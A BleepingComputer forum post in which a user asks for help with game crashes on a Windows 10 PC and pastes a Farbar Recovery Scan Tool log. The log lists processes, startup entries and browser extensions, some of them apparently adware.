Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Crashes while playing minecraft, maybe rundll32.exe?


  • This topic is locked This topic is locked
23 replies to this topic

#1 Alban18

Alban18

  • Members
  • 34 posts
  • OFFLINE
  •  
  • Local time:01:42 AM

Posted 27 January 2016 - 06:22 PM

This is my uncle's computer and my little cousin is a daily computer user.
He told me since a week or two ago, his games (minecraft and trove) would freeze after like 15-30 minutes of playing and a screen prompt would pop up telling him that the
display driver has crashed and has been restored. Then he closes the prompt and closes his game since it doesn't unfreeze.
He contacted hp technical support a couple of days ago and the representative said that it was hacked and one of the problems is the rundll32.exe application.
The rep also sent him all the problems that he found remotely in a .txt file. But I will just list what he said here:
 
Here is the frst.txt file:
 
 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:27-01-2016
Ran by sesay (ATTENTION: The user is not administrator) on BASEMENT-PC (27-01-2016 17:54:31)
Running from C:\Users\sesay\Desktop
Loaded Profiles: MuhammadAkim & sesay (Available Profiles: MuhammadAkim & abang & sesay & hakim)
Platform: Windows 10 Home Version 1511 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
Failed to access process -> smss.exe
Failed to access process -> csrss.exe
Failed to access process -> wininit.exe
Failed to access process -> services.exe
Failed to access process -> lsass.exe
Failed to access process -> svchost.exe
Failed to access process -> svchost.exe
Failed to access process -> svchost.exe
Failed to access process -> svchost.exe
Failed to access process -> vsserv.exe
Failed to access process -> svchost.exe
Failed to access process -> svchost.exe
Failed to access process -> svchost.exe
Failed to access process -> igfxCUIService.exe
Failed to access process -> dasHost.exe
Failed to access process -> svchost.exe
Failed to access process -> svchost.exe
Failed to access process -> OmniServ.exe
Failed to access process -> IntelCpHeciSvc.exe
Failed to access process -> spoolsv.exe
Failed to access process -> svchost.exe
Failed to access process -> svchost.exe
Failed to access process -> svchost.exe
Failed to access process -> AppleMobileDeviceService.exe
Failed to access process -> mDNSResponder.exe
Failed to access process -> SkypeC2CPNRSvc.exe
Failed to access process -> svchost.exe
Failed to access process -> svchost.exe
Failed to access process -> svchost.exe
Failed to access process -> BtwRSupportService.exe
Failed to access process -> updatesrv.exe
Failed to access process -> SkypeC2CAutoUpdateSvc.exe
Failed to access process -> wlanext.exe
Failed to access process -> conhost.exe
Failed to access process -> GamesAppIntegrationService.exe
Failed to access process -> HPSA_Service.exe
Failed to access process -> HPSupportSolutionsFrameworkService.exe
Failed to access process -> jhi_service.exe
Failed to access process -> LMS.exe
Failed to access process -> PresentationFontCache.exe
Failed to access process -> iPodService.exe
Failed to access process -> officeclicktorun.exe
Failed to access process -> SearchIndexer.exe
Failed to access process -> RtkAudioService64.exe
Failed to access process -> csrss.exe
Failed to access process -> winlogon.exe
Failed to access process -> dwm.exe
Failed to access process -> RAVBg64.exe
(Hewlett-Packard) C:\Program Files\Hewlett-Packard\SimplePass\ClientCore.exe
(Hewlett-Packard) C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBrokerDsktop.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
Failed to access process -> opvapp.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2015\bdagent.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Microsoft Corporation) C:\Windows\System32\browser_broker.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2015\bdwtxag.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(CyberLink Corp.) C:\Program Files (x86)\CyberLink\YouCam\YouCamService.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE15\CSISYNCCLIENT.EXE
(Hewlett-Packard) C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBroker.exe
() C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeHost.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
(Valve Corporation) C:\Program Files (x86)\Steam\Steam.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
Failed to access process -> SteamService.exe
Failed to access process -> fontdrvhost.exe
(Microsoft Corporation) C:\Windows\System32\msinfo32.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
(Oracle Corporation) C:\Program Files (x86)\Minecraft\runtime\jre-x64\1.8.0_25\bin\java.exe
(Oracle Corporation) C:\Program Files (x86)\Minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe
(Skype Technologies S.A.) C:\Program Files (x86)\Skype\Phone\Skype.exe
(Adobe Systems Incorporated) C:\Windows\System32\Macromed\Flash\FlashUtil_ActiveX.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
(Microsoft Corporation) C:\Windows\System32\Speech_OneCore\Common\SpeechRuntime.exe
Failed to access process -> svchost.exe
Failed to access process -> SearchProtocolHost.exe
Failed to access process -> SearchFilterHost.exe
 

==================== Registry (Whitelisted) ===========================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8790264 2016-01-15] (Realtek Semiconductor)
HKLM\...\Run: [Bdagent] => C:\Program Files\Bitdefender\Bitdefender 2015\bdagent.exe [1603544 2015-11-11] (Bitdefender)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [170256 2015-12-17] (Apple Inc.)
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2014-10-02] (Apple Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [596528 2015-12-22] (Oracle Corporation)
HKU\S-1-5-21-1436452318-2580999886-2786755032-1003\...\Run: [Bitdefender Wallet Agent] => C:\Program Files\Bitdefender\Bitdefender 2015\bdwtxag.exe [790880 2015-11-11] (Bitdefender)
HKU\S-1-5-21-1436452318-2580999886-2786755032-1003\...\Run: [Gameo] => C:\Users\sesay\AppData\Roaming\Gameo\gameo.exe [42482176 2015-07-04] ()
HKU\S-1-5-21-1436452318-2580999886-2786755032-1003\...\Run: [GoogleChromeAutoLaunch_F360403BC2EC98CA32D7EC0F47FB7B5E] => C:\Users\sesay\AppData\Local\Chromium\Application\chrome.exe [667136 2015-08-11] (The Chromium Authors)
HKU\S-1-5-21-1436452318-2580999886-2786755032-1003\...\Run: [NowUSeeIt Player] => "C:\Program Files (x86)\NowUSeeItPlayer\NowUSeeItPlayer.exe" /autostart=1
HKU\S-1-5-21-1436452318-2580999886-2786755032-1003\...\Run: [msnmsgr] => "C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe" /background
HKU\S-1-5-21-1436452318-2580999886-2786755032-1003\...\RunOnce: [Uninstall C:\Users\sesay\AppData\Local\Microsoft\OneDrive\17.3.6201.1019_1\amd64] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\sesay\AppData\Local\Microsoft\OneDrive\17.3.6201.1019_1\amd64"
ShellIconOverlayIdentifiers: [###MegaShellExtPending] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX64.dll No File
ShellIconOverlayIdentifiers: [###MegaShellExtSynced] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX64.dll No File
ShellIconOverlayIdentifiers: [###MegaShellExtSyncing] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX64.dll No File
ShellIconOverlayIdentifiers-x32: [###MegaShellExtPending] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX32.dll No File
ShellIconOverlayIdentifiers-x32: [###MegaShellExtSynced] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX32.dll No File
ShellIconOverlayIdentifiers-x32: [###MegaShellExtSyncing] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX32.dll No File
Startup: C:\Users\sesay\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Curse.lnk [2016-01-21]
ShortcutTarget: Curse.lnk -> C:\Users\sesay\AppData\Roaming\Curse Client\Bin\Curse.exe (Curse, Inc)
Startup: C:\Users\sesay\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MEGAsync.lnk [2016-01-22]
ShortcutTarget: MEGAsync.lnk -> C:\Users\sesay\AppData\Local\MEGAsync\MEGAsync.exe (No File)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{7a5d4b11-e3c0-473f-8cb1-6ef96b29487a}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{ec741dab-2cfc-4a75-94f0-0a77b7af259e}: [DhcpNameServer] 192.168.1.1
 
Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-1436452318-2580999886-2786755032-1003\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://g.live.com/1rewlive4startup/home
URLSearchHook: [S-1-5-21-1436452318-2580999886-2786755032-1001] ATTENTION => Default URLSearchHook is missing
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_omxmedia_15_52_ssg03&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0D0AyD0D0EtBzz0CyDtCyByD0B0A0B0DtN0D0Tzu0StCyEyDtCtN1L2XzutAtFtCyCtFtCtFtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StD0Fzy0FyBzy0DzztGyE0F0F0CtGtByDtD0EtGyByC0F0EtGtCzyyEtDtB0AtDyEtDtByEyD2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzzyCzz0FyCtA0D0CtG0Bzz0E0BtGyE0D0B0EtGzzyEtCzztGyEtC0ByB0A0ByB0CyCyDtA0E2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCtBzyyB%26cr%3D2082660329%26a%3Dwbf_omxmedia_15_52_ssg03%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_omxmedia_15_52_ssg03&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0D0AyD0D0EtBzz0CyDtCyByD0B0A0B0DtN0D0Tzu0StCyEyDtCtN1L2XzutAtFtCyCtFtCtFtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StD0Fzy0FyBzy0DzztGyE0F0F0CtGtByDtD0EtGyByC0F0EtGtCzyyEtDtB0AtDyEtDtByEyD2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzzyCzz0FyCtA0D0CtG0Bzz0E0BtGyE0D0B0EtGzzyEtCzztGyEtC0ByB0A0ByB0CyCyDtA0E2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCtBzyyB%26cr%3D2082660329%26a%3Dwbf_omxmedia_15_52_ssg03%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKLM -> {29DAFA99-4299-408B-A085-18B288E65C09} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us1-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
SearchScopes: HKLM-x32 -> {29DAFA99-4299-408B-A085-18B288E65C09} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us1-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
SearchScopes: HKU\S-1-5-21-1436452318-2580999886-2786755032-1003 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_omxmedia_15_51_ssg03&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0D0AyD0D0EtBzz0CyDtCyByD0B0A0B0DtN0D0Tzu0StCyEyEyBtN1L2XzutAtFtCyCtFtCtFtDtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2SyB0FtCtD0CtA0B0CtGyBzzyD0CtG0EyDtBzytGtAzzzyyBtG0EyDtByDyEyCyE0FtCtC0B0D2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzzyB0D0CtBtBzy0CtG0Azz0FyCtGyE0C0DtAtG0B0EyEtBtGyDyEyBzzzyyByDtB0F0DyBtB2QtN0A0LzuyE%26cr%3D1057114629%26a%3Dwncy_omxmedia_15_51_ssg03%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKU\S-1-5-21-1436452318-2580999886-2786755032-1003 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_omxmedia_15_51_ssg03&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0D0AyD0D0EtBzz0CyDtCyByD0B0A0B0DtN0D0Tzu0StCyEyEyBtN1L2XzutAtFtCyCtFtCtFtDtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2SyB0FtCtD0CtA0B0CtGyBzzyD0CtG0EyDtBzytGtAzzzyyBtG0EyDtByDyEyCyE0FtCtC0B0D2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzzyB0D0CtBtBzy0CtG0Azz0FyCtGyE0C0DtAtG0B0EyEtBtGyDyEyBzzzyyByDtB0F0DyBtB2QtN0A0LzuyE%26cr%3D1057114629%26a%3Dwncy_omxmedia_15_51_ssg03%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKU\S-1-5-21-1436452318-2580999886-2786755032-1003 -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL =
SearchScopes: HKU\S-1-5-21-1436452318-2580999886-2786755032-1003 -> {6B023522-B37A-4323-9007-FF11E4F94C80} URL = hxxp://www.bing.com/search?FORM=WLETDF&PC=WLEM&q={searchTerms}&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-1436452318-2580999886-2786755032-1003 -> {8CDE19E6-71C2-4B46-89B7-35F6A18C571A} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wny_omxmedia_15_51_ssg03&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3DWinYahoo%26cd%3D2XzuyEtN2Y1L1Qzu0D0AyD0D0EtBzz0CyDtCyByD0B0A0B0DtN0D0Tzu0StCyEyEzztN1L2XzutAtFtCyEtFtDtFtDtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2SyE0EzytAyEzzzz0AtGyD0A0CyEtGyByEyCtCtGyEyB0DyDtGzy0Ezz0DyByDyCtCzytB0Czz2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzzyB0D0CtBtBzy0CtG0Azz0FyCtGyE0C0DtAtG0B0EyEtBtGyDyEyBzzzyyByDtB0F0DyBtB2QtN0A0LzuyE%26cr%3D1118004757%26a%3Dwny_omxmedia_15_51_ssg03%26os%3DWindows%2B10%2BHome&p={searchTerms}
BHO: Bitdefender Wallet  -> {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -> C:\Program Files\Bitdefender\Bitdefender 2015\pmbxie.dll [2015-12-18] (Bitdefender)
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\OCHelper.dll [2015-12-15] (Microsoft Corporation)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_71\bin\ssv.dll [2016-01-21] (Oracle Corporation)
BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-01-08] (Microsoft Corporation)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\GROOVEEX.DLL [2016-01-21] (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_71\bin\jp2ssv.dll [2016-01-21] (Oracle Corporation)
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll [2013-08-28] (Hewlett-Packard)
BHO-x32: Bitdefender Wallet -> {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -> C:\Program Files\Bitdefender\Bitdefender 2015\Antispam32\pmbxie.dll [2015-12-18] (Bitdefender)
BHO-x32: Evernote extension -> {92EF2EAD-A7CE-4424-B0DB-499CF856608E} -> C:\Program Files (x86)\Evernote\Evernote\EvernoteIE.dll [2014-12-17] (Evernote Corp., 305 Walnut Street, Redwood City, CA 94063)
BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation)
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2013-08-28] (Hewlett-Packard)
Toolbar: HKLM - Bitdefender Wallet  - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - C:\Program Files\Bitdefender\Bitdefender 2015\pmbxie.dll [2015-12-18] (Bitdefender)
Toolbar: HKLM-x32 - Bitdefender Wallet - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - C:\Program Files\Bitdefender\Bitdefender 2015\Antispam32\pmbxie.dll [2015-12-18] (Bitdefender)
Handler-x32: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\Office15\MSOSB.DLL [2015-08-22] (Microsoft Corporation)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-01-08] (Microsoft Corporation)
Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation)
 
FireFox:
========
FF Plugin: @java.com/DTPlugin,version=11.71.2 -> C:\Program Files\Java\jre1.8.0_71\bin\dtplugin\npDeployJava1.dll [2016-01-21] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.71.2 -> C:\Program Files\Java\jre1.8.0_71\bin\plugin2\npjp2.dll [2016-01-21] (Oracle Corporation)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2015-10-14] ()
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/pdf -> C:\Program Files (x86)\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2014-10-20] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.fdf -> C:\Program Files (x86)\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2014-10-20] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.xdp -> C:\Program Files (x86)\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2014-10-20] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.xfdf -> C:\Program Files (x86)\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2014-10-20] (Foxit Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.56 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2014-10-10] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2014-10-10] (Intel Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office 15\root\Office15\NPSPWRAP.DLL [2015-08-18] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-05] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-05] (Google Inc.)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll [2014-11-14] ()
FF Plugin HKU\S-1-5-21-1436452318-2580999886-2786755032-1003: @citrixonline.com/appdetectorplugin -> C:\Users\sesay\AppData\Local\Citrix\Plugins\104\npappdetector.dll [2016-01-27] (Citrix Online)
FF HKLM\...\Firefox\Extensions: [bdwteffv19@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2015\\antispam32\bdwteff
FF Extension: Bitdefender Wallet - C:\Program Files\Bitdefender\Bitdefender 2015\\antispam32\bdwteff [2015-12-20]
FF HKLM\...\Thunderbird\Extensions: [bdThunderbird@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2015\bdtbext
FF Extension: Bitdefender Antispam Toolbar - C:\Program Files\Bitdefender\Bitdefender 2015\bdtbext [2015-08-13] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [firefox@bho.com] - C:\Program Files\Hewlett-Packard\SimplePass\FFBHOExt
FF Extension: HP SimplePass - C:\Program Files\Hewlett-Packard\SimplePass\FFBHOExt [2015-03-25] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [bdwteffv19@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2015\\antispam32\bdwteff
FF HKLM-x32\...\Thunderbird\Extensions: [bdThunderbird@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2015\bdtbext
 
Chrome:
=======
CHR HomePage: Default -> hxxp://www.search.ask.com/?o=APN10645A&gct=hp&d=406-679&v=n9092-93&t=4
CHR StartupUrls: Default -> "hxxp://www.search.ask.com/?o=APN10645A&gct=hp&d=406-679&v=n9092-93&t=4","hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wny_omxmedia_15_51_ssg03&param1=1&param2=f%3D7%26b%3DChrome%26cc%3Dus%26pa%3DWinYahoo%26cd%3D2XzuyEtN2Y1L1Qzu0D0AyD0D0EtBzz0CyDtCyByD0B0A0B0DtN0D0Tzu0StCyEyEzztN1L2XzutAtFtCyEtFtDtFtDtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2SyE0EzytAyEzzzz0AtGyD0A0CyEtGyByEyCtCtGyEyB0DyDtGzy0Ezz0DyByDyCtCzytB0Czz2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzzyB0D0CtBtBzy0CtG0Azz0FyCtGyE0C0DtAtG0B0EyEtBtGyDyEyBzzzyyByDtB0F0DyBtB2QtN0A0LzuyE%26cr%3D1118004757%26a%3Dwny_omxmedia_15_51_ssg03%26os%3DWindows%2B10%2BHome"
CHR Profile: C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Slides) - C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-11-08]
CHR Extension: (Google Docs) - C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-11-17]
CHR Extension: (Google Drive) - C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-11-17]
CHR Extension: (MEGA) - C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Default\Extensions\bigefpfhnfcobdlfbedofhhaibnlghod [2016-01-26]
CHR Extension: (YouTube) - C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-11-17]
CHR Extension: (Google Search) - C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-17]
CHR Extension: (Bitdefender Wallet) - C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Default\Extensions\fabcmochhfpldjekobfaaggijgohadih [2015-11-08]
CHR Extension: (Google Sheets) - C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-11-08]
CHR Extension: (Google Docs Offline) - C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-11-17]
CHR Extension: (Ask Search) - C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Default\Extensions\mppnoffgpafgpgbaigljliadgbnhljfl [2016-01-22]
CHR Extension: (iLivid) - C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Default\Extensions\nafaimnnclfjfedmmabolbppcngeolgf [2016-01-22]
CHR Extension: (Chrome Web Store Payments) - C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-11-08]
CHR Extension: (Free Games Zone) - C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Default\Extensions\oppjbdkgpfhhllancffaoaemplhkngoc [2016-01-22]
CHR Extension: (Gmail) - C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-11-17]
CHR Profile: C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Profile 1
CHR Extension: (Google Slides) - C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2016-01-22]
